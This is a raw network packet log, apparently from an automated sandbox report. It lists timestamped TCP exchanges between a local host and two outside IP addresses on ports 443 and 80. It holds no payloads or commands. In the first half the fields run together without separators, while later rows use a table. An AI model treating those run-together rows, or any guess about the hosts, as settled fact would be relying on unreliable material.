                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.335227966 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.335236073 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.335258007 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.335316896 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.335321903 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.336038113 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.336102962 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.336111069 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.336945057 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.337006092 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.337018967 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.337055922 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.337110996 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.337119102 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.337913990 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.338001013 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.338015079 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.338875055 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.338932037 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.338939905 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.338994980 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339060068 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339066982 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339674950 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339704037 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339757919 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339771032 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339776039 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339803934 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.339859962 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.340624094 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.340683937 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.340692997 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.341540098 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.341592073 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.341593981 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.341607094 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.341650009 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.341658115 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.342451096 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.342504978 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.342508078 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.342516899 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.342561960 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.342570066 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.342611074 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.343400002 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.343451977 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.343453884 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.343462944 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.343504906 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.343512058 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.344347000 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.344398975 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.344404936 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.344419003 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.344470978 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.344477892 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.344618082 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.345271111 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.345330000 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.345336914 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.346149921 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.346204042 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.346204996 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.400600910 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.400886059 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.400954962 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.400962114 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.401137114 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.401201963 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.401209116 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.401525021 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.401588917 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.401597023 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.429470062 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.429552078 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.429568052 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475074053 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475210905 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475229025 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475294113 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475306988 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475567102 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475630045 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475660086 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475886106 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475941896 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475950003 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.516882896 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.516984940 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517004967 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517221928 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517261028 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517292023 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517299891 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517338037 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517680883 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517750025 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517757893 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.518095016 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.518158913 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.518165112 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.520817995 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.520879030 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.520903111 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521173954 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521238089 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521251917 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521711111 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521769047 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521770954 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521787882 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521831989 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521842957 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521958113 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.522396088 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.522454977 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.522466898 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.548202038 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.548284054 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.548311949 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.548455954 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.548515081 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.548523903 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.593930960 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.594029903 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.594084024 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.594207048 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.594239950 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.594310045 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.594310045 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.594336987 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.635668039 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.635741949 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.635756969 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.635879993 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.635920048 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.635943890 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.635951996 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.635962009 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.636280060 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.636337996 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.636343956 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.636723042 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.636784077 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.636791945 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.637115002 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.637197971 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.637204885 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.639307022 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.639370918 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.639378071 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.639674902 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.639744997 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.639751911 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.640202999 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.640285015 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.640291929 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.640593052 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.640662909 CET49706443192.168.2.8142.215.209.78
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 18, 2024 16:52:38.640671968 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.640943050 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.641007900 CET | 49706 | 443 | 192.168.2.8 | 142.215.209.78
Nov 18, 2024 16:52:38.641015053 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.667419910 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.667498112 CET | 49706 | 443 | 192.168.2.8 | 142.215.209.78
Nov 18, 2024 16:52:38.667505980 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.667630911 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.667695045 CET | 49706 | 443 | 192.168.2.8 | 142.215.209.78
Nov 18, 2024 16:52:38.667702913 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.709477901 CET | 49706 | 443 | 192.168.2.8 | 142.215.209.78
Nov 18, 2024 16:52:38.712774038 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.712785006 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.712853909 CET | 49706 | 443 | 192.168.2.8 | 142.215.209.78
Nov 18, 2024 16:52:38.712868929 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.713144064 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.713201046 CET | 49706 | 443 | 192.168.2.8 | 142.215.209.78
Nov 18, 2024 16:52:38.713207960 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.754179001 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.754326105 CET | 49706 | 443 | 192.168.2.8 | 142.215.209.78
Nov 18, 2024 16:52:38.754338026 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.754722118 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.754765987 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.754796982 CET | 49706 | 443 | 192.168.2.8 | 142.215.209.78
Nov 18, 2024 16:52:38.754806995 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.754818916 CET | 49706 | 443 | 192.168.2.8 | 142.215.209.78
Nov 18, 2024 16:52:38.755012989 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.755074024 CET | 49706 | 443 | 192.168.2.8 | 142.215.209.78
Nov 18, 2024 16:52:38.755084038 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.755201101 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.755263090 CET | 49706 | 443 | 192.168.2.8 | 142.215.209.78
Nov 18, 2024 16:52:38.755269051 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.755815983 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.755880117 CET | 49706 | 443 | 192.168.2.8 | 142.215.209.78
Nov 18, 2024 16:52:38.755887985 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.755930901 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.755995989 CET | 49706 | 443 | 192.168.2.8 | 142.215.209.78
Nov 18, 2024 16:52:38.756001949 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.759501934 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.759582043 CET | 49706 | 443 | 192.168.2.8 | 142.215.209.78
Nov 18, 2024 16:52:38.759591103 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.760519028 CET | 443 | 49706 | 142.215.209.78 | 192.168.2.8
Nov 18, 2024 16:52:38.760580063 CET | 49706 | 443 | 192.168.2.8 | 142.215.209.78
Nov 18, 2024 16:52:38.762568951 CET | 49706 | 443 | 192.168.2.8 | 142.215.209.78
Nov 18, 2024 16:52:55.825814962 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:55.832340956 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:55.833765984 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:55.833884954 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:55.838738918 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.510338068 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.510385036 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.510396957 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.510416985 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.510430098 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.510441065 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.510447979 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.510462046 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.510461092 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.510493994 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.510507107 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.510512114 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.510520935 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.510679960 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.515561104 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.515611887 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.515624046 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.515661955 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.568876982 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.627480984 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.627537966 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.627557993 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.627654076 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.627876043 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.627911091 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.627928972 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.627931118 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.627948999 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.627968073 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.627983093 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.628016949 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.628154993 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.628174067 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.628232002 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.628803015 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.628854036 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.628870964 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.628895998 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.678257942 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.744565964 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.744611025 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.744637012 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.744649887 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.744661093 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.744663954 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.744693995 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.745315075 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.745341063 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.745352983 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.745369911 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.745393991 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.745471001 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.745484114 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.745526075 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.745896101 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.745986938 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.745999098 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.746011972 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.746031046 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.746048927 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.863621950 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.863648891 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.863662004 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.863675117 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.863687038 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.863702059 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.863702059 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.863729000 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.863754988 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.863883972 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.863919020 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.863930941 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
Nov 18, 2024 16:52:56.863965034 CET | 55648 | 80 | 192.168.2.8 | 23.94.171.138
Nov 18, 2024 16:52:56.864012957 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
